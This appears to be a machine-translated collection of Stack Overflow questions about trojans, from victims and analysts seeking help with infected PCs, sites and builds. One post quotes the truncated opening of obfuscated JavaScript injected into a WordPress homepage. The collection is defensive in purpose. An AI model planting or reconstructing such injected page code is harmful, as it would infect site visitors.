问题标签 [trojan]

我正在使用 IDA pro 用打包程序来反转木马，我看到木马通过用 winrar 解压我的木马来解压一些文件（实际上是两个文件）。现在我想看看到底发生了什么，并试图使用 IDA pro 来反汇编它，但是当用字符串分析它时，我没有找到解压的文件名，这就是为什么我假设它们被推送到堆栈，我想知道如何在 IDA pro 中设置一个条件，如果一个寄存器包含一个字符串，例如 if %eax = string （任何字符串），则会引发该条件。

谢谢你的帮助

我使用 osx86 开发软件。我下载并安装了 iantares v2.2 (snow leopard 6.3.3) 和带有 ios sdk 4.0 dmg 的 xcode 3.2.3。当我使用xcode打开我的项目并构建它时，我发现路由器上的灯开始闪烁，关闭xcode后，灯停止闪烁。如果我只打开xcode并打开我的项目，路由器灯不会闪烁，只有在我构建我的项目时才会闪烁。

我在网上用谷歌搜索并没有发现任何关于 xcode 的病毒或木马，但是如何解释我看到的内容？

最近我发现一个木马程序在我的系统中运行，它将一些随机名称的 exe 复制到我的驱动器（C: 除外），并将随机名称的 exe 复制到 temp 并反过来询问防火墙网络连接请求（由此我认为它是木马） ..它还更改了隐藏文件的注册表值....

主要问题是我在任务管理器中找不到它...甚至检查了所有 svchosts 进程位置...我卡住了！

那么有什么方法可以监视特定的注册表项并知道哪个程序正在修改它...？谢谢！！

Nod32 刚刚警告我有关嵌入网站图标的特洛伊木马。

我在这里复制了 favicon.ico 的内容：http: //pastebin.com/BkD4tKNy

不幸的是，我对 Javascript 并没有真正的经验，而且代码对我来说看起来很神秘。谁能说这段代码有什么害处？

谢谢和亲切的问候

我正在开始进行 Android 和 iOS 开发，因此相关资源的链接也将受到赞赏，只是我找不到任何相关的东西。

案例详细信息：我必须构建一个应用程序，将一些关键信息保存在一个变量中，该变量被创建、通过 ssl 加密连接发送并被销毁。设备上的任何其他进程都不应读取此变量。到目前为止，我知道可能发生两种情况：

[1] 一个服务或程序监视前台应用程序（这将是我的应用程序），然后它是否可以注入一些代码（例如让前台绑定到流氓服务）以读取有问题的变量内容。我知道存在操作系统保护措施，但是否有任何证据证明这种注入代码的能力？

[2] 服务或程序监视网络连接并记录通过线路发送的数据。应用程序是否有可能读取这样的网络数据？我知道存在可以记录每个应用程序交换的数据量的应用程序，但我不知道它们是读取系统日志文件还是实际监视连接。如果可以为这两个平台提供详细信息，将不胜感激。

在设置新的 http-server 时，我发现 netstat 中出现了一些奇怪的连接：

这台计算机上几乎没有运行任何东西——这些高端口似乎是用于木马的。

任何人都可以帮我提供信息吗？

我的防病毒程序 (CA Anti-Virus) 刚开始报告在 Eclipse 中为我的 Android 项目生成的一些 .dex 文件中存在“AndroidOS/SMSTrj.D!generic”。（我不是在写恶意软件！）

有没有其他人见过类似的东西？

我的开发环境是否以某种方式受到感染，或者这是误报？我如何验证我的系统，如果它是真实的，如何对我的系统进行消毒？

我没有找到任何关于这个木马的信息（CA 网站报告没有信息）。有没有人提供有关此信息的指针（特别是有关消毒开发环境的信息）？

我访问了我正在制作的 wordpress 网站并收到了一个木马警告我已经使用各种在线扫描仪对其进行了检查，这似乎是一些内联框架代码问题。我什至不知道 wordpress 会被感染。

请帮助我，我在其他 stackexchange wordpress 和网站管理员论坛中尝试过没有答案，所有的专业人士都在这里...... :)

这是屏幕截图。

http://i.stack.imgur.com/NaSE6.png

现在这是主页中的一些恶意代码脚本代码

if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new Date()).index+[];aaa= '0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1) f='-30!-30!66!63!-

.... 还有更多

怎么恢复？？？

最近我发现我建的很多网站都感染了恶意软件。

我做的第一件事是将网站的所有内容下载到我的本地 PC，并在其上提供了带有 Windows Security Essentials 的扫描。WSE 在几个 (4/15) 网站的 index.php 上发现了一个木马。修复索引后，我将所有内容上传到我的网络服务器，问题就解决了。

但时间不长。一个月后，问题又来了。与此同时，我购买了一台全新的笔记本电脑，安装了干净的 Windows 7。我做了与之前相同的技巧（我第一次发现恶意软件时），结果还发现了几个木马。修复并上传后问题解决。

但是这一次问题不断出现，我不知道该怎么办了。有没有人遇到过这样的问题？

感染恶意软件的网站列表：

• maurijnpach.nl
• banket-ritmeester.nl
• mtbmuseum.nl
• dekipspecialist.nl

我唯一想到的是所有网站都托管在同一个托管服务提供商上：Webreus

有人对我有任何建议或更好的解决方案吗？

我们网站的一些用户在访问该网站时开始收到“木马威胁”的报告。听到这个后，我搜索了恶意软件代码，但无法在任何地方找到它。

我安装了 Sucuci SiteCheck 插件，它报告了以下内容：

http://sitecheck.sucuri.net/scanner/?&scan=http://www.londonirishcentre.org

有人知道如何找到流氓代码吗？我知道全新的 WP 安装会是最好的，但该网站已经完成了很多自定义工作，我宁愿将其留给最后一个选项。

任何帮助将不胜感激。